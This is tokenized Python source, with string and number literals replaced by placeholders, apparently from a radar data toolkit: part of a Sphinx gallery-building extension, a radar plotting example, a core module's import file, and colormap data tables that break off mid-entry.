as fid : <EOL> pickle . dump ( example_code_obj , fid , <EOL> pickle . HIGHEST_PROTOCOL ) <EOL> fid . close ( ) <EOL> if '<STR_LIT>' in my_globals : <EOL> my_stdout = my_stdout . replace ( <EOL> my_globals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> my_stdout = my_stdout . strip ( ) <EOL> if my_stdout : <EOL> stdout = '<STR_LIT>' % ( <EOL> '<STR_LIT>' . join ( my_stdout . split ( '<STR_LIT:\n>' ) ) ) <EOL> open ( stdout_path , '<STR_LIT:w>' ) . write ( stdout ) <EOL> open ( time_path , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % time_elapsed ) <EOL> os . chdir ( cwd ) <EOL> for fig_num in ( fig_mngr . num for fig_mngr in <EOL> matplotlib . _pylab_helpers . Gcf . get_all_fig_managers ( ) ) : <EOL> plt . figure ( fig_num ) <EOL> plt . savefig ( image_path % fig_num ) <EOL> figure_list . append ( image_fname % fig_num ) <EOL> except : <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> print ( '<STR_LIT>' % fname ) <EOL> traceback . print_exc ( ) <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> finally : <EOL> os . chdir ( cwd ) <EOL> sys . stdout = orig_stdout <EOL> print ( "<STR_LIT>" % time_elapsed ) <EOL> else : <EOL> figure_list = [ f [ len ( image_dir ) : ] <EOL> for f in glob . glob ( image_path % '<STR_LIT>' ) ] <EOL> this_template = plot_rst_template <EOL> if os . path . exists ( first_image_file ) : <EOL> make_thumbnail ( first_image_file , thumb_file , <NUM_LIT> , <NUM_LIT> ) <EOL> if not os . path . exists ( thumb_file ) : <EOL> make_thumbnail ( '<STR_LIT>' , thumb_file , <NUM_LIT:200> , <NUM_LIT> ) <EOL> docstring , short_desc , end_row = extract_docstring ( example_file ) <EOL> if len ( figure_list ) == <NUM_LIT:1> : <EOL> figure_name = figure_list [ <NUM_LIT:0> ] <EOL> image_list = SINGLE_IMAGE % figure_name . lstrip ( '<STR_LIT:/>' ) <EOL> else : <EOL> image_list = HLIST_HEADER <EOL> for figure_name in figure_list : <EOL> image_list += HLIST_IMAGE_TEMPLATE % figure_name . lstrip ( '<STR_LIT:/>' ) <EOL> f = open ( os . path . join ( target_dir , fname [ : - <NUM_LIT:2> ] + '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> f . write ( this_template % locals ( ) ) <EOL> f . flush ( ) <EOL> def embed_code_links ( app , exception ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if exception is not None : <EOL> return <EOL> print ( '<STR_LIT>' ) <EOL> doc_resolvers = { } <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( app . builder . outdir , <EOL> relative = True ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> example_dir = os . path . join ( app . builder . srcdir , '<STR_LIT>' ) <EOL> html_example_dir = os . path . abspath ( os . path . join ( app . builder . outdir , <EOL> '<STR_LIT>' ) ) <EOL> link_pattern = '<STR_LIT>' <EOL> orig_pattern = '<STR_LIT>' <EOL> period = '<STR_LIT>' <EOL> for dirpath , _ , filenames in os . walk ( html_example_dir ) : <EOL> for fname in filenames : <EOL> print ( '<STR_LIT>' % fname ) <EOL> full_fname = os . path . join ( html_example_dir , dirpath , fname ) <EOL> subpath = dirpath [ len ( html_example_dir ) + <NUM_LIT:1> : ] <EOL> pickle_fname = os . path . join ( example_dir , subpath , <EOL> fname [ : - <NUM_LIT:5> ] + '<STR_LIT>' ) <EOL> if os . path . exists ( pickle_fname ) : <EOL> with open ( pickle_fname , '<STR_LIT:rb>' ) as fid : <EOL> example_code_obj = pickle . load ( fid ) <EOL> fid . close ( ) <EOL> str_repl = { } <EOL> for name , cobj in example_code_obj . iteritems ( ) : <EOL> this_module = cobj [ '<STR_LIT>' ] . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> if this_module not in doc_resolvers : <EOL> continue <EOL> link = doc_resolvers [ this_module ] . resolve ( cobj , <EOL> full_fname ) <EOL> if link is not None : <EOL> parts = name . split ( '<STR_LIT:.>' ) <EOL> name_html = orig_pattern % parts [ <NUM_LIT:0> ] <EOL> for part in parts [ <NUM_LIT:1> : ] : <EOL> name_html += period + orig_pattern % part <EOL> str_repl [ name_html ] = link_pattern % ( link , name_html ) <EOL> if len ( str_repl ) > <NUM_LIT:0> : <EOL> with open ( full_fname , '<STR_LIT:rb>' ) as fid : <EOL> lines_in = fid . readlines ( ) <EOL> with open ( full_fname , '<STR_LIT:wb>' ) as fid : <EOL> for line in lines_in : <EOL> line = line . decode ( '<STR_LIT:utf-8>' ) <EOL> for name , link in str_repl . iteritems ( ) : <EOL> line = line . replace ( name , link ) <EOL> fid . write ( line . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" ) <EOL> print ( e . code ) <EOL> except URLError as e : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> print ( e . args ) <EOL> print ( '<STR_LIT>' ) <EOL> def setup ( app ) : <EOL> app . connect ( '<STR_LIT>' , generate_example_rst ) <EOL> app . add_config_value ( '<STR_LIT>' , True , '<STR_LIT:html>' ) <EOL> build_image_dir = '<STR_LIT>' <EOL> if os . path . exists ( build_image_dir ) : <EOL> filelist = os . listdir ( build_image_dir ) <EOL> for filename in filelist : <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> os . remove ( os . path . join ( build_image_dir , filename ) ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import netCDF4 <EOL> import matplotlib . pyplot as plt <EOL> import pyart <EOL> filename = '<STR_LIT>' <EOL> radar = pyart . io . read_cfradial ( filename ) <EOL> radar . metadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> display = pyart . graph . RadarDisplay ( radar ) <EOL> fig = plt . figure ( figsize = [ <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> fig . subplots_adjust ( hspace = <NUM_LIT> ) <EOL> xlabel = '<STR_LIT>' <EOL> ylabel = '<STR_LIT>' <EOL> colorbar_label = '<STR_LIT>' <EOL> nplots = radar . nsweeps <EOL> for snum in radar . sweep_number [ '<STR_LIT:data>' ] : <EOL> fixed_angle = radar . fixed_angle [ '<STR_LIT:data>' ] [ snum ] <EOL> title = '<STR_LIT>' % ( fixed_angle ) <EOL> ax = fig . add_subplot ( nplots , <NUM_LIT:1> , snum + <NUM_LIT:1> ) <EOL> display . plot ( '<STR_LIT>' , snum , vmin = - <NUM_LIT:20> , vmax = <NUM_LIT:20> , <EOL> mask_outside = False , title = title , <EOL> axislabels = ( xlabel , ylabel ) , <EOL> colorbar_label = colorbar_label , ax = ax ) <EOL> display . set_limits ( ylim = [ <NUM_LIT:0> , <NUM_LIT:15> ] , ax = ax ) <EOL> time_start = netCDF4 . num2date ( radar . time [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] , radar . time [ '<STR_LIT>' ] ) <EOL> figure_title = '<STR_LIT>' + time_start . isoformat ( ) + '<STR_LIT>' <EOL> fig . text ( <NUM_LIT> , <NUM_LIT> , figure_title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from . radar import Radar <EOL> from . grid import Grid <EOL> from . transforms import antenna_to_cartesian <EOL> from . transforms import antenna_vectors_to_cartesian <EOL> from . transforms import cartesian_to_geographic <EOL> from . transforms import cartesian_vectors_to_geographic <EOL> from . transforms import cartesian_to_geographic_aeqd <EOL> from . transforms import geographic_to_cartesian <EOL> from . transforms import geographic_to_cartesian_aeqd <EOL> from . . exceptions import _deprecated_alias <EOL> from . . util import radar_utils as _radar_utils <EOL> is_vpt = _deprecated_alias ( <EOL> _radar_utils . is_vpt , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> to_vpt = _deprecated_alias ( <EOL> _radar_utils . to_vpt , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> __all__ = [ s for s in dir ( ) if not s . startswith ( '<STR_LIT:_>' ) ] </s>
<s> """<STR_LIT>""" <EOL> _NWSRef_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] <EOL> } <EOL> _NWSVel_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _NWS_SPW_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _RefDiff_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _Carbone11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Carbone17_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _RRate11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( 